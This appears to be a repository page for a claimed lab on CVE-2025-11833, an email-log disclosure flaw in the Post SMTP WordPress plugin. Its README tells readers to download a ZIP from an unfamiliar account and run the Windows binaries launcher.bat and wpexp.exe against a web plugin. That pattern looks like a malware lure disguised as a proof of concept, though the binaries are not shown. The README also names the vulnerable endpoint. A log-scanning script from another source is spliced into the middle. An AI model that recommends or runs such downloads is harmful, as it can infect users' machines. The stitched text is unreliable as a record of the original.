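Related vulnerability

Title: Post SMTP 3.6.0 Unauthenticated Email Log Disclosure Vulnerability (CVE-2025-11833)

Description: The WordPress plugin "Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App", in versions up to and including 3.6.0, is vulnerable to unauthorized data access because of a missing capability check in the __construct function. This allows unauthenticated attackers to read arbitrary logged emails sent through the Post SMTP plugin, including password reset emails that contain password reset links, which can lead to account takeover.

Introduction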
            # Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure
## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.
## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems. 
## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests.
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.
## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
   - `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
   - `launcher.bat`: A batch file to launch the exploit.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.
3. Set up the vulnerable environment:
   - Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
   - Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
   - Install the vulnerable Post SMTP plugin.
   - Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
   - Enter the target URL (e.g., `http://localhost/wordpress`).
   - Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
   - Run the exploit to retrieve and display logged emails.
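
A defender-side check for the request described in the Quick Start, as an added example that is not part of the original README or the plugin's code: it scans web server access logs in the combined format for requests that name the `postman_get_logs` action and groups them by client IP. The path and action name are taken from this README and are assumed, not verified against the plugin source; the log lines are constructed samples.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Indicator values come from this README's Quick Start (assumption: not
# verified against the plugin source). Pass other values to find_log_access().
SUSPECT_PATH = "/wp-admin/admin-ajax.php"
SUSPECT_ACTION = "postman_get_logs"

# Apache/Nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [12/Nov/2025:10:01:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
    '203.0.113.7 - - [12/Nov/2025:10:01:05 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=postman%5Fget%5Flogs&page=2 HTTP/1.1" 200 39110 "-" "curl/8.5.0"',
    '198.51.100.4 - - [12/Nov/2025:10:02:00 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [12/Nov/2025:10:03:00 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

def find_log_access(lines, path=SUSPECT_PATH, action=SUSPECT_ACTION):
    """Return {client_ip: [hit, ...]} for requests whose query string names `action`."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-combined line
        url = urlsplit(m["target"])
        # parse_qs percent-decodes, so an encoded action name still matches.
        actions = parse_qs(url.query).get("action", [])
        if not url.path.endswith(path) or action not in actions:
            continue
        hits[m["ip"]].append({
            "time": m["ts"],
            "status": int(m["status"]),
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            # A 200 with a non-empty body means data was returned: review first.
            "review": m["status"] == "200" and m["size"] not in ("-", "0"),
        })
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in find_log_access(SAMPLE).items():
        print(ip, len(reqs), "request(s),", sum(r["review"] for r in reqs), "to review")
```

Access logs record neither POST bodies nor authentication state, so an action sent in a request body is not visible here, and each hit still has to be correlated with session data before it is treated as unauthenticated access.
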
For questions or contributions, email me at ukeouxnp760s25@hotmail.com
        
File snapshot
        
            
                
 [4.0K]  /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K]  README.md
└── [4.0K]  scripts
    ├── [   1]  config.ini
    └── [8.5M]  cve-2025-11833-lab.zip
1 directory, 3 files
                
             
         